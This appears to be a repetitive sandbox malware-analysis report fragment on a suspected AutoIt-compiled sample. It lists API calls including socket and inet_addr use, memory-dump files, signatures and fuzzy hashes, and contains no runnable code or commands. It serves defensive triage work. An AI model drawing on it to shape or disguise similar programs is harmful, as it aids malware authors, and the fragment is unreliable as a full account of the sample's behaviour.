                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010444D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID: SysTreeView32
                                                                                                            • API String ID: 847901565-1698111956
                                                                                                            • Opcode ID: 5c34f54e81bfe6553d8fa222da00573a77f8d23fbae6a1f3f36145cb8d85b0b6
                                                                                                            • Instruction ID: 56cbe57524a927eadbe5668ee3af0e9efb6ac562c893c36c015e7aaac0e7624c
                                                                                                            • Opcode Fuzzy Hash: 5c34f54e81bfe6553d8fa222da00573a77f8d23fbae6a1f3f36145cb8d85b0b6
                                                                                                            • Instruction Fuzzy Hash: 3631C2B1210205AFEF618E38DC85BDA7BA9EB48334F208725F9B5D21D1DB74E8509B50
                                                                                                            APIs
                                                                                                              • Part of subcall function 0103335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01033077,?,?), ref: 01033378
                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0103307A
                                                                                                            • _wcslen.LIBCMT ref: 0103309B
                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 01033106
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                            • String ID: 255.255.255.255
                                                                                                            • API String ID: 946324512-2422070025
                                                                                                            • Opcode ID: 051b0f2e343f47c66653f4f92fd7aaeaecff85380191772714189ea91d0bd695
                                                                                                            • Instruction ID: aa9b8729c29bf2652f247288ee4762b6a50ec7847b19a4799f8bca5e3ebaa419
                                                                                                            • Opcode Fuzzy Hash: 051b0f2e343f47c66653f4f92fd7aaeaecff85380191772714189ea91d0bd695
                                                                                                            • Instruction Fuzzy Hash: 9E31D2396042019FD720CF2DC5D5AAABBF8FF94318F148099E9968F392DB76E941C760
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01044705
                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01044713
                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0104471A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                            • String ID: msctls_updown32
                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                            • Opcode ID: 49575626c6157dbb88810cf23a6a5187d3864a07e3350d81750c86381f3b048f
                                                                                                            • Instruction ID: 102564006b4a2f49e6dff30bd519149455adabcaa6d26d98493783e48cb7a8f0
                                                                                                            • Opcode Fuzzy Hash: 49575626c6157dbb88810cf23a6a5187d3864a07e3350d81750c86381f3b048f
                                                                                                            • Instruction Fuzzy Hash: 44211BB5600209AFEB11DF68DCC1DAA37ADEF4A294B040499FA94DB251CA75EC12DB60
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                            • API String ID: 176396367-2734436370
                                                                                                            • Opcode ID: dd1a5d12214a83e6857511c0c9520939ca048929fa4ba693fc0df263c7cce52e
                                                                                                            • Instruction ID: ebc85b98bbcd5a199ba6b4f68e74056dd24b19ac0dd925254f6e0ea7e610d594
                                                                                                            • Opcode Fuzzy Hash: dd1a5d12214a83e6857511c0c9520939ca048929fa4ba693fc0df263c7cce52e
                                                                                                            • Instruction Fuzzy Hash: A521A07210421167E331BB2D9C22FBB73DD9F95308F05442AFAC597146EB5CA941D3E1
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01043840
                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01043850
                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01043876
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                            • String ID: Listbox
                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                            • Opcode ID: fb20632f5fa42170b394d6b256abe9b351402b388d0121521d616e81067797fb
                                                                                                            • Instruction ID: ff2c0eabce95729e276bf5c331bce290e3cdc4caba16ce3dd6f3598801215d32
                                                                                                            • Opcode Fuzzy Hash: fb20632f5fa42170b394d6b256abe9b351402b388d0121521d616e81067797fb
                                                                                                            • Instruction Fuzzy Hash: F421B3B2610228BBEB22CE59CC85EAB37AEFF89750F109164F9849B190C675DC518790
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 01024A08
                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01024A5C
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,0104CC08), ref: 01024AD0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                            • String ID: %lu
                                                                                                            • API String ID: 2507767853-685833217
                                                                                                            • Opcode ID: 1e08a4aad0f8cf7a55de883127223af5551bafb5bb990614ac1aba84c1a63943
                                                                                                            • Instruction ID: 4df27189fd2411a8cd1c8dd4105e1188d988b3e4df022df275d6b1281e1a8c0d
                                                                                                            • Opcode Fuzzy Hash: 1e08a4aad0f8cf7a55de883127223af5551bafb5bb990614ac1aba84c1a63943
                                                                                                            • Instruction Fuzzy Hash: C2318F74A00109AFDB10DF54C9C5EAA7BF8EF08308F1480A9E949DB252D775ED45CB61
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0104424F
                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01044264
                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01044271
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: msctls_trackbar32
                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                            • Opcode ID: e5627601f7bc306fba54d5efe0b4a5b86fc43d991a0e833aa702344abd3837f7
                                                                                                            • Instruction ID: 958bcaf217f4680347e7dd014e3fadae4a3257a17df02c00f5f60790e44d5fae
                                                                                                            • Opcode Fuzzy Hash: e5627601f7bc306fba54d5efe0b4a5b86fc43d991a0e833aa702344abd3837f7
                                                                                                            • Instruction Fuzzy Hash: 9311C6B1240248BFEF215E69CC46FAB3BACEF85B64F014525FA95E6090D671D8119B20
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                              • Part of subcall function 01012DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01012DC5
                                                                                                              • Part of subcall function 01012DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01012DD6
                                                                                                              • Part of subcall function 01012DA7: GetCurrentThreadId.KERNEL32 ref: 01012DDD
                                                                                                              • Part of subcall function 01012DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01012DE4
                                                                                                            • GetFocus.USER32 ref: 01012F78
                                                                                                              • Part of subcall function 01012DEE: GetParent.USER32(00000000), ref: 01012DF9
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 01012FC3
                                                                                                            • EnumChildWindows.USER32(?,0101303B), ref: 01012FEB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                            • String ID: %s%d
                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                            • Opcode ID: d34b03f4ddd38ce0f2934c7a6b34c4cff5cbbd23e8ad8b7ab4711530908e29dd
                                                                                                            • Instruction ID: c09bf308316d8b5297480d0366c46a0ed10a8768a1400d9d3473b54b926863da
                                                                                                            • Opcode Fuzzy Hash: d34b03f4ddd38ce0f2934c7a6b34c4cff5cbbd23e8ad8b7ab4711530908e29dd
                                                                                                            • Instruction Fuzzy Hash: ED1102B1200206ABDF157F60CDD5EEE37AAAF94314F008079F9499B146DE3898498B30
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010458C1
                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010458EE
                                                                                                            • DrawMenuBar.USER32(?), ref: 010458FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                            • Opcode ID: 3bdf69183403e4e1219cbd6338ae8c7d40363b7b774d0690d26bbddf445c3d1d
                                                                                                            • Instruction ID: 5a6734fd2c850cd529b4be9f222ab3ad5e7d44e0371475032c14e4c6fb19c20f
                                                                                                            • Opcode Fuzzy Hash: 3bdf69183403e4e1219cbd6338ae8c7d40363b7b774d0690d26bbddf445c3d1d
                                                                                                            • Instruction Fuzzy Hash: AC01C4B5500208AFDB219F11DC85FAFBBB5FF45760F0080A9E889D6151DB348A84DF20
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4eac5262054d4140d629a114f2988ba1a1ee578ac0b12914bf1a71af4d136477
                                                                                                            • Instruction ID: a8e81caea487fb675cff4eb2d1bdcaf0a8b7b7521d4ea73b4633401e8e067d7a
                                                                                                            • Opcode Fuzzy Hash: 4eac5262054d4140d629a114f2988ba1a1ee578ac0b12914bf1a71af4d136477
                                                                                                            • Instruction Fuzzy Hash: 7BC16E75A0020AEFDB15CF98C884AAEBBB9FF48704F108598F585EB259D735DD81CB90
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1036877536-0
                                                                                                            • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                            • Instruction ID: 4620457575876801546dae63dc0ce482d5d241cd2b6a8a349c126c7b26911693
                                                                                                            • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                            • Instruction Fuzzy Hash: 2CA14872D003C69FDB16CF19CC917AEBBE5EF65360F1841ADE6859B281C238A941E750
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 1998397398-0
                                                                                                            • Opcode ID: e4b60104176066c26057cf10b003671ec878a27f5cc1cbb3b3b094740eeef992
                                                                                                            • Instruction ID: b47de7f2640ecf556915c4286de35b4b32e01d8b074a56444c4a23162046184d
                                                                                                            • Opcode Fuzzy Hash: e4b60104176066c26057cf10b003671ec878a27f5cc1cbb3b3b094740eeef992
                                                                                                            • Instruction Fuzzy Hash: 5BA158756043019FC710EF29C985A6ABBE9FF88314F088859F98A9B365DB34ED01DF91
                                                                                                            APIs
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0104FC08,?), ref: 010105F0
                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0104FC08,?), ref: 01010608
                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0104CC40,000000FF,?,00000000,00000800,00000000,?,0104FC08,?), ref: 0101062D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0101064E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 314563124-0
                                                                                                            • Opcode ID: 404cb9727df11c51cc5517377b937e0fc950f27101988bae1502235ba024887d
                                                                                                            • Instruction ID: 56a93c2dce3a0e14600b1b415ef2fdaf2ab70371bc0f78b73757f652c5732d46
                                                                                                            • Opcode Fuzzy Hash: 404cb9727df11c51cc5517377b937e0fc950f27101988bae1502235ba024887d
                                                                                                            • Instruction Fuzzy Hash: BA816B71A00109EFCB04CF98C984EEEB7B9FF89315F204598F546AB254DB75AE46CB60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: ae98dca3075db20f7c4b732631731ed6f27e71f82e66c1d63151498975e4c8f7
                                                                                                            • Instruction ID: 99ab527f01a214c5d07289e7ffff556c3aa8b94778f5ee37a2ebd17685d043f6
                                                                                                            • Opcode Fuzzy Hash: ae98dca3075db20f7c4b732631731ed6f27e71f82e66c1d63151498975e4c8f7
                                                                                                            • Instruction Fuzzy Hash: 55412E3190010CEBDB25EBBD9C45BBE3AA5FF82370F184226FA19D72B1E67848417671
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(0118EAB0,?), ref: 010462E2
                                                                                                            • ScreenToClient.USER32(?,?), ref: 01046315
                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01046382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3880355969-0
                                                                                                            • Opcode ID: c20b94b6614d0da832ba0c83e8e90cbf9d66211990ffda35cf788354e1c388c7
                                                                                                            • Instruction ID: 79285265417ea4916b45cbdace78ed3153d592bce836a5c825349521d59118b4
                                                                                                            • Opcode Fuzzy Hash: c20b94b6614d0da832ba0c83e8e90cbf9d66211990ffda35cf788354e1c388c7
                                                                                                            • Instruction Fuzzy Hash: C3516CB4A00249AFDF21CF58D9C09AE7BF5FF46321F1081A9F8A497291E732E941CB50
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 01031AFD
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031B0B
                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01031B8A
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031B94
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
